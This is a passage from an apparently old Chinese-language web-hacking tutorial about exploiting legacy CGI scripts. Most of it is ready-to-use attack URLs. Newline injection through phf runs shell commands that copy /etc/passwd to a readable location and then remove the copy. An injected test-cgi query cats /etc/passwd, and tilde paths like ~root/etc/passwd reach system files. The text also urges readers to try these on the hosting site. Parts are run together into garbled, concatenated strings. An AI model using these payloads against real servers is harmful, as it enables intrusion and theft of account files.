me=&QOffice_phone=http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=http://thegnome.com/~someuser/passwdhttp://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname
=haqr&Qemail=&Qnickname=&Qoffice_phone=上面执行的命令是idls -la ~someusercp /etc/passwd ~someuser/passwdrm ~someuser/passwd
2。有关test攻击http://thegnome.com/cgi-bin/test-cgi?\whatever服务器会应答,本服务器的一些情况如:CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4BSERVER_NAME = thegnome.comGATEWAY_INTERFACE = CGI/1.1SERVER_PROTOCOL = HTTP/1.0SERVER_PORT = 80REQUEST_METHOD = GETHTTP_ACCEPT = text/plain, application/x-Html, application/html,text/html, text/x-htmlPATH_INFO =PATH_TRANSLATED =SCRIPT_NAME = /cgi-bin/test-cgiQUERY_STRING = whateverREMOTE_HOST = fifth.column.govREMOTE_ADDR = 200.200.200.200REMOTE_USER =AUTH_TYPE =CONTENT_TYPE =CONTENT_LENGTH =
好吧,让我们来点赶兴趣的http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
3。~的应用~主要是用在很多的个人主页上的快捷目录的方法,如果我们使用这样的~http://thegnome.com/~roothttp://thegnome.com/~root/etc/passwd不是在任何平台上都通过呦,在BSD Apache上曾经成功过,当然还可以试试~bin ,~etc,~uUCp.....看到这个站点了吗,本站所在的这个站点就是用这种形式的,如果我们打入 本站所在的web地址/~bin出现了什么,你看到了吗?然后...............注意请不要破坏
(出处:http://www.sheup.com)